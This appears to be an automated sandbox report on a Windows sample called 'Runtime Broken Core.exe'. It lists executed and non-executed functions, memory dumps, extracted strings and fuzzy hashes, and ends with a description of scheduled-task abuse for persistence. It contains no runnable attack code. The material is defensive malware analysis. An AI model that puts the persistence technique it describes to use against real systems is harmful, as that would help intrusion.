Opcode Fuzzy Hash: da45935846206c2eb1aa805830638e06303ccf4a1a544400e5d9bd21561c7117
Instruction Fuzzy Hash: D911A7B3D0C56747D20573F9BC624FE2754EF4923A708E272D39ED8653AE18604B45C5

Function 00007FFAAC6304FA Relevance: 5.0, Strings: 4, Instructions: 14COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFAAC630772
L_^), xrefs: 00007FFAAC6306C9
L_^, xrefs: 00007FFAAC63079A
L_^L, xrefs: 00007FFAAC630762

Memory Dump Source

Source File: 00000016.00000002.1722781947.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffaac630000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^)$L_^L
API String ID: 0-2913285933
Opcode ID: 409238f69dcc90bb9eeabc606b6c8e93302a275957c2630b4c8cf606c3fd444b
Instruction ID: 6b606679ba1f3e0ff4001d687aedf0313fd20b5139e21b69a58c89ad3ee2684d
Opcode Fuzzy Hash: 409238f69dcc90bb9eeabc606b6c8e93302a275957c2630b4c8cf606c3fd444b
Instruction Fuzzy Hash: 29D01276D0C1630BD70177F8F4265D53B508F4723A708C1B3D1CD9D5A39E05205582CB

Analysis Process: Runtime Broken Core.exePID: 7496, Parent PID: 4056COMMON

Executed Functions

Function 00007FFAAC6212F8 Relevance: 4.5, Strings: 3, Instructions: 771COMMON

Download Yara Rule

Strings

1M_^, xrefs: 00007FFAAC621301
(Q, xrefs: 00007FFAAC621948
(Q, xrefs: 00007FFAAC6219D4

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$1M_^
API String ID: 0-2376534497
Opcode ID: 26916905db344587a567ed1845d4017597468c1d9f4c896888ccd8d102d6f4eb
Instruction ID: 74e81202633d5e6926ce9dbf8efe08159d65e3b7a8cbb9a030acb32c3eef5741
Opcode Fuzzy Hash: 26916905db344587a567ed1845d4017597468c1d9f4c896888ccd8d102d6f4eb
Instruction Fuzzy Hash: 56A12C72D0D6964FE702F778A4655F97FA0EF46225B0882B7D1CDCB193DD1868098381

Function 00007FFAAC6214D3 Relevance: 4.4, Strings: 3, Instructions: 616COMMON

Download Yara Rule

Strings

/M_^, xrefs: 00007FFAAC621501
(Q, xrefs: 00007FFAAC621948
(Q, xrefs: 00007FFAAC6219D4

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$/M_^
API String ID: 0-1029777741
Opcode ID: 6a715088df43fe68d78669764ea67201d072f5fbcac347b85cb8d1ef379c5632
Instruction ID: 52c18b740399ce461864f670806003780986fb83a247dce8f89eb94d9f63d5a9
Opcode Fuzzy Hash: 6a715088df43fe68d78669764ea67201d072f5fbcac347b85cb8d1ef379c5632
Instruction Fuzzy Hash: 26516E71E0DA498FF741E77898555F9BBE1EF5A210F0491B6D08CD71D3EE289C068381

Function 00007FFAAC6214A0 Relevance: 3.1, Strings: 2, Instructions: 623COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC621948
(Q, xrefs: 00007FFAAC6219D4

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q
API String ID: 0-2438238192
Opcode ID: 132bdfd9d7aaceb3d15544e2f2afb574961f043ead0e4e0e411606d06b7bc414
Instruction ID: 168523eb3d5d2be71fab9a63d956fa3024ecc4cb4cb0a36e425977ce35aef586
Opcode Fuzzy Hash: 132bdfd9d7aaceb3d15544e2f2afb574961f043ead0e4e0e411606d06b7bc414
Instruction Fuzzy Hash: 7A518D71E0DA898FFB52E77898555F8BBE1EF56310B0491B6D08DD71D3EE289C068381

Function 00007FFAAC620D2F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC620E6D

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 265266c8f32c93f492046d405381e86c859be56e54a033dff4ccfed0ec5386e2
Instruction ID: b172d5a3c8077770abb2bcce86a07a1cf43f077b0e808090c2c16016996041fb
Opcode Fuzzy Hash: 265266c8f32c93f492046d405381e86c859be56e54a033dff4ccfed0ec5386e2
Instruction Fuzzy Hash: 8A415D72F1965A8FE741EB78D8245F9BBE0FF45310B4486BAD04DC7293EE3868098781

Function 00007FFAAC620D98 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC620E6D

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: c9fc7547f1f235ecc6a0fb988e8aabed19d05a679d74b26c70dc040acfc78f87
Instruction ID: 4651233cc29f7ceec3008764b7c10f3b0918d75493c01289868ac85f2dc41f22
Opcode Fuzzy Hash: c9fc7547f1f235ecc6a0fb988e8aabed19d05a679d74b26c70dc040acfc78f87
Instruction Fuzzy Hash: 5C31FBB1E1964A8FEB45EBB884595E9BBF1FF49300F4095B9D04DC72D7EE3868048781

Function 00007FFAAC620DA8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC620E6D

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: bbd59fe1a208d725e1fc4a5d9e8d18f4506421f899ab763977abdc23eafb15f7
Instruction ID: e111e700d748fb0c1241c520796a5426b5c88b9cf49e0e8344231b762e26e917
Opcode Fuzzy Hash: bbd59fe1a208d725e1fc4a5d9e8d18f4506421f899ab763977abdc23eafb15f7
Instruction Fuzzy Hash: 1F31A9B1E19A4A8FEB45EBB884595E9BBE1FF49300F408579E00DC7297EE3868448781

Function 00007FFAAC622249 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

8e, xrefs: 00007FFAAC62226D

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: 8e
API String ID: 0-1620073548
Opcode ID: 2db1ca563688d1e4ce982dbf6be00efc8ff027b69e78ae48e7187bf9bdc49229
Instruction ID: 754bcacac175342c0d51da0089adab93a9e5991dcfa8cb6ce57e27fc18cf3392
Opcode Fuzzy Hash: 2db1ca563688d1e4ce982dbf6be00efc8ff027b69e78ae48e7187bf9bdc49229
Instruction Fuzzy Hash: FAF04261D0DB400FE795E728985A5657FE0DF95210F0845EBD44CC71E7ED1CDC858382

Non-executed Functions

Function 00007FFAAC6205FA Relevance: 6.7, Strings: 5, Instructions: 480COMMON

Download Yara Rule

Strings

>M_^, xrefs: 00007FFAAC620601
M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^), xrefs: 00007FFAAC6206C9
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: >M_^$M_^$M_^$M_^)$M_^L
API String ID: 0-1138645643
Opcode ID: 23b77a6be0770b7d570126b4a35f02698396ffaa7777bcd615ade116ff3b99a5
Instruction ID: bfb1b47a2ab12d58f6a84fa36cd92116f1fa0651a4427d2ecf3aafdd1e6a701e
Opcode Fuzzy Hash: 23b77a6be0770b7d570126b4a35f02698396ffaa7777bcd615ade116ff3b99a5
Instruction Fuzzy Hash: C4E18567D0D1A74BE30277FCF8614EA7B50DF4623A70883B7D1CDD91A3AE18604A8295

Function 00007FFAAC6206D3 Relevance: 6.7, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^9, xrefs: 00007FFAAC620712
M_^1, xrefs: 00007FFAAC6206F2
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^1$M_^9$M_^L
API String ID: 0-3190274578
Opcode ID: eee7da05e715777162e9b23d664b6b1d0a8ed039a68b6ec7c12a8508d8976213
Instruction ID: 155efad439a15ae4d16b3e72eafc47d44758603d9863f3ce7f3d7f490d71a377
Opcode Fuzzy Hash: eee7da05e715777162e9b23d664b6b1d0a8ed039a68b6ec7c12a8508d8976213
Instruction Fuzzy Hash: 17C19577D0D1A74BE30277F8F8754EA7B50DF4622A70883B7D1CDD91A3EE18604A8295

Function 00007FFAAC6206E8 Relevance: 6.6, Strings: 5, Instructions: 394COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^9, xrefs: 00007FFAAC620712
M_^1, xrefs: 00007FFAAC6206F2
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^1$M_^9$M_^L
API String ID: 0-3190274578
Opcode ID: bb63a8481e64788ebf4247688dae2958df620a0ea3c88c4c19f766cdba8a4b5d
Instruction ID: 1fec1520528bdf803d3554e2db3e7766ae3f318c68c7c6e9be8939f9a7551e41
Opcode Fuzzy Hash: bb63a8481e64788ebf4247688dae2958df620a0ea3c88c4c19f766cdba8a4b5d
Instruction Fuzzy Hash: A0C1A777D0D1A74BE30277F8F8754EA7F50DF4622A70882B7D1CDD91A3EE18604A8295

Function 00007FFAAC6205D3 Relevance: 5.5, Strings: 4, Instructions: 489COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^), xrefs: 00007FFAAC6206C9
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^)$M_^L
API String ID: 0-1883181980
Opcode ID: f8efce2b149ef4fc3b42f7d46b6ffc65bcfc2a5232e17ef1204118fe4bd16d62
Instruction ID: 7c358839133a515baa615417ff68118e76c5f7403f3d611cbe62c8b026287708
Opcode Fuzzy Hash: f8efce2b149ef4fc3b42f7d46b6ffc65bcfc2a5232e17ef1204118fe4bd16d62
Instruction Fuzzy Hash: DBE18667D0D1A74BE30277FCF8668EA7B50DF4623A708C3B7D1CDD91A3AD18604A8295

Function 00007FFAAC620620 Relevance: 5.5, Strings: 4, Instructions: 458COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^), xrefs: 00007FFAAC6206C9
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^)$M_^L
API String ID: 0-1883181980
Opcode ID: 5c44e7803381eccf845e65ab7b1645b75cf96bdd95af63d15f96e68ec12eeebf
Instruction ID: 0beeed2915c7c9557fe52631a09262e8489cad1edba426cd9b832b8bde0d3eb0
Opcode Fuzzy Hash: 5c44e7803381eccf845e65ab7b1645b75cf96bdd95af63d15f96e68ec12eeebf
Instruction Fuzzy Hash: B1D18567D0D1A74BE30277F8F8724EA7B50DF4623A709C2B7D1CDD91A3AE18604A8295

Function 00007FFAAC6206B8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^), xrefs: 00007FFAAC6206C9
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^)$M_^L
API String ID: 0-1883181980
Opcode ID: b7e281d5b100e7d6a208d138f6fa3d160e3699aa15c8a47c5ca46b15d9dd5c90
Instruction ID: 3520fb40a0e0bfa78e79ff3da459b0c053139f473886d855b1cd0ab673329b2a
Opcode Fuzzy Hash: b7e281d5b100e7d6a208d138f6fa3d160e3699aa15c8a47c5ca46b15d9dd5c90
Instruction Fuzzy Hash: F511E3B3D0C5278AE20673F8BC624FA7780EF4923E749D3B2D29ED8693BD18604645C4

Function 00007FFAAC6204FA Relevance: 5.0, Strings: 4, Instructions: 14COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAC620772
M_^, xrefs: 00007FFAAC62079A
M_^), xrefs: 00007FFAAC6206C9
M_^L, xrefs: 00007FFAAC620762

Memory Dump Source

Source File: 00000017.00000002.1803678330.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffaac620000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^)$M_^L
API String ID: 0-1883181980
Opcode ID: 8da6ef5ca01cd28b834c9cd4953c171c9e744a310c821cc190d9c1118f62ce31
Instruction ID: 7f4a0d644da35bbfc8f2daa5aee559065cebca3ed076746a58b3b82e110b6311
Opcode Fuzzy Hash: 8da6ef5ca01cd28b834c9cd4953c171c9e744a310c821cc190d9c1118f62ce31
Instruction Fuzzy Hash: 38D0C966D0C1620AD60177B8B4265D53B508F4622A708C2B2D1CD9D5A39E052055828A

Analysis Process: Runtime Broken Core.exePID: 1624, Parent PID: 932COMMON

Executed Functions

Function 00007FFAAC6012F8 Relevance: 4.5, Strings: 3, Instructions: 766COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC6019D4
(Q, xrefs: 00007FFAAC601948
1O_^, xrefs: 00007FFAAC601301

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$1O_^
API String ID: 0-2384715151
Opcode ID: daaf67796ddd8c7453e0af81fe9c2345c2258de9d590811fea2b9f9d3631c101
Instruction ID: 4278b75d2ba1fa72c78b92ab5703e023ba1651a7646443c6bf59e8824b23bb2c
Opcode Fuzzy Hash: daaf67796ddd8c7453e0af81fe9c2345c2258de9d590811fea2b9f9d3631c101
Instruction Fuzzy Hash: 26913976D0D6929FE742F7BCA4655E93BA0EF46325B08C0B7D1CDDB193DD14A84A8380

Function 00007FFAAC6014D3 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC6019D4
(Q, xrefs: 00007FFAAC601948
/O_^, xrefs: 00007FFAAC601501

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q$/O_^
API String ID: 0-1055259939
Opcode ID: 06bdcf53fcbd60c3bacf70958a259443a828d70207d6b72565e12d0bac36a9d3
Instruction ID: d489e3001c54890499bad1653d706f32fb95acdaf79a83a222f18085ffa83be3
Opcode Fuzzy Hash: 06bdcf53fcbd60c3bacf70958a259443a828d70207d6b72565e12d0bac36a9d3
Instruction Fuzzy Hash: 08518C71E0DA4A5FEB81E77CD4516F97BE1EF59320F048076D08DE7193DE24984A8380

Function 00007FFAAC6014A0 Relevance: 3.1, Strings: 2, Instructions: 618COMMON

Download Yara Rule

Strings

(Q, xrefs: 00007FFAAC6019D4
(Q, xrefs: 00007FFAAC601948

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: (Q$(Q
API String ID: 0-2438238192
Opcode ID: e7418076a7a06cb8a095a027d60058c9d7932c0c4bea764e315d3a0f0e779101
Instruction ID: 19da47a20ed8f9368618343d8b519cc2e5b61207efce1321d47dfa1d88bcd8aa
Opcode Fuzzy Hash: e7418076a7a06cb8a095a027d60058c9d7932c0c4bea764e315d3a0f0e779101
Instruction Fuzzy Hash: 50518C71E0DA465FFB82E77C84516F87BE1EF5A310F0494BAD08DD7193DE24980A8380

Function 00007FFAAC600D2F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC600E6D

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: d0d09fc2a9844cde912b4ee3c067e8c3f7f2afcfd42dad72c57d86838b0ddf6e
Instruction ID: fbeb05f9e4a832d2a54d5f5762f0ae2feab0f30e79e7c80f7d19c2ef862e688e
Opcode Fuzzy Hash: d0d09fc2a9844cde912b4ee3c067e8c3f7f2afcfd42dad72c57d86838b0ddf6e
Instruction Fuzzy Hash: 16414872E186469FE781EB7CD4245E93BA0FF85310B008476D08DDB2A3DD34AC49C390

Function 00007FFAAC600D98 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC600E6D

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: f600aa138c1da250b7906a2472365281c44755bf5fb3feb3e90dfec7b05aa50d
Instruction ID: 70e3c098c41df88a61b2b729b2cd77face23b959e7aae37fd39b5e1cb44c095c
Opcode Fuzzy Hash: f600aa138c1da250b7906a2472365281c44755bf5fb3feb3e90dfec7b05aa50d
Instruction Fuzzy Hash: 8D31E9B1E18A4A9FEB85EBB8C4655E97FE1FF89300B40C4B9D04ED7296DD34A805C780

Function 00007FFAAC600DA8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC600E6D

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 4c1a814c4e8aebcbab7eb63467133006518b7a292621e7afd1c354a23f893c99
Instruction ID: 42649fda8a7e0b898325e3fcf9a524c43a0bb6e8ca5c562b308d9a37311d805f
Opcode Fuzzy Hash: 4c1a814c4e8aebcbab7eb63467133006518b7a292621e7afd1c354a23f893c99
Instruction Fuzzy Hash: 2331C9B1E18A4A9FEB85EBB8C4655E97FE1FF48300B408579D44ED7296DD34A805C740

Function 00007FFAAC602249 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

8e, xrefs: 00007FFAAC60226D

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: 8e
API String ID: 0-1620073548
Opcode ID: b829bb6176b5acf6050727288644b8b8c09423c738e4c5a0aa8369990caf0ed1
Instruction ID: 68d171336b8d8e35257659b418aa028132bd5119767bff018ed0f2527bd8ed7c
Opcode Fuzzy Hash: b829bb6176b5acf6050727288644b8b8c09423c738e4c5a0aa8369990caf0ed1
Instruction Fuzzy Hash: FBF04C61A0DB540FE7D5E668A8669657FE0DFA6310B0885EBD88CC71E7DC18DC858382

Non-executed Functions

Function 00007FFAAC6005FA Relevance: 6.7, Strings: 5, Instructions: 491COMMON

Download Yara Rule

Strings

O_^), xrefs: 00007FFAAC6006C9
O_^, xrefs: 00007FFAAC600772
O_^, xrefs: 00007FFAAC60079A
O_^L, xrefs: 00007FFAAC600762
>O_^, xrefs: 00007FFAAC600601

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: >O_^$O_^$O_^$O_^)$O_^L
API String ID: 0-231463976
Opcode ID: 0ee1b93211cdf24b993105064af1ecc58a44c1f182e223f902c375a5c4999126
Instruction ID: 9178089b4ebe2ccd62fb989cc5186b1ff6936501ef4d7f7ac10ff8be6c2028a4
Opcode Fuzzy Hash: 0ee1b93211cdf24b993105064af1ecc58a44c1f182e223f902c375a5c4999126
Instruction Fuzzy Hash: 19E1B467D0D2A35BE20277FDF4615EA3B50DF8623A70CC5B3D2CDDD1A39E08648A8295

Function 00007FFAAC6006D3 Relevance: 6.7, Strings: 5, Instructions: 414COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAAC600772
O_^9, xrefs: 00007FFAAC600712
O_^, xrefs: 00007FFAAC60079A
O_^1, xrefs: 00007FFAAC6006F2
O_^L, xrefs: 00007FFAAC600762

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^1$O_^9$O_^L
API String ID: 0-1117014954
Opcode ID: 01e1cd06054fb3dc03392ea6156a62dea7c0456ae87c6d9cc53ee8dad8d291b6
Instruction ID: 230c2161f6bdd6fcd2dc51ce4d21e17fde22dee511a431437d4a1a3f5ff4c64e
Opcode Fuzzy Hash: 01e1cd06054fb3dc03392ea6156a62dea7c0456ae87c6d9cc53ee8dad8d291b6
Instruction Fuzzy Hash: FDC1B367D0D2A35BE30277BCF4615E63B50DF8623A708C1B7D2CDDD1A39E18648A8295

Function 00007FFAAC6006E8 Relevance: 6.7, Strings: 5, Instructions: 405COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAAC600772
O_^9, xrefs: 00007FFAAC600712
O_^, xrefs: 00007FFAAC60079A
O_^1, xrefs: 00007FFAAC6006F2
O_^L, xrefs: 00007FFAAC600762

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^1$O_^9$O_^L
API String ID: 0-1117014954
Opcode ID: 7099c7689c682751640016946e2936cb66aa0f2deeca521bb56a938ca941ad52
Instruction ID: 550334c52f5589fac3560991918eb338cf32499ec9feff673d3d01c05e2a17e2
Opcode Fuzzy Hash: 7099c7689c682751640016946e2936cb66aa0f2deeca521bb56a938ca941ad52
Instruction Fuzzy Hash: 08C1B367D0D2A35BE30277FCB4615E63B50DF8623A708C1B7D2CDDD1A3DE18648A8295

Function 00007FFAAC600620 Relevance: 5.5, Strings: 4, Instructions: 469COMMON

Download Yara Rule

Strings

O_^), xrefs: 00007FFAAC6006C9
O_^, xrefs: 00007FFAAC600772
O_^, xrefs: 00007FFAAC60079A
O_^L, xrefs: 00007FFAAC600762

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^)$O_^L
API String ID: 0-276454591
Opcode ID: 4384ad10cfcaf0c44ab446188dbb32db8736e0b129d07136de206643d7673baf
Instruction ID: 8a4ebd23723f13817649a3b1729c802583b76339957fe3ef175219ecd2075a4e
Opcode Fuzzy Hash: 4384ad10cfcaf0c44ab446188dbb32db8736e0b129d07136de206643d7673baf
Instruction Fuzzy Hash: E8D1B367D0D1A35BE30277FDF4625EA3B509F8623A70CC1B3D2CDDD1A39E08648A8295

Function 00007FFAAC6006B8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

O_^), xrefs: 00007FFAAC6006C9
O_^, xrefs: 00007FFAAC600772
O_^, xrefs: 00007FFAAC60079A
O_^L, xrefs: 00007FFAAC600762

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^)$O_^L
API String ID: 0-276454591
Opcode ID: 6b346cc3e949a871a44f60bcb74da71508cf53720bbdb616838dee755430cd22
Instruction ID: 2b1b6c5b518542e33e0a2edf0963c5c8f46f35aa4f819d152d59c40d04869f47
Opcode Fuzzy Hash: 6b346cc3e949a871a44f60bcb74da71508cf53720bbdb616838dee755430cd22
Instruction Fuzzy Hash: DE11E3B3D0C5274AE24673F8BC625EA2780EF8933B708D672D29FD9353AD1C609641C4

Function 00007FFAAC6004FA Relevance: 5.0, Strings: 4, Instructions: 14COMMON

Download Yara Rule

Strings

O_^), xrefs: 00007FFAAC6006C9
O_^, xrefs: 00007FFAAC600772
O_^, xrefs: 00007FFAAC60079A
O_^L, xrefs: 00007FFAAC600762

Memory Dump Source

Source File: 0000001A.00000002.2079271030.00007FFAAC600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffaac600000_Runtime Broken Core.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^)$O_^L
API String ID: 0-276454591
Opcode ID: 6d713db6fa51136f330e6ac8315d79016536c1054f3e2bf1ca724f6244b2bf59
Instruction ID: 6a27a27c602fc37776b93c88d758a0bbcfd7fd3112f0020e2685be2871f46635
Opcode Fuzzy Hash: 6d713db6fa51136f330e6ac8315d79016536c1054f3e2bf1ca724f6244b2bf59
Instruction Fuzzy Hash: B9D01276D0C1630BD70177F8F0266D53B508F8623A708C1B3D2CDDD5A39E04249982DA

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
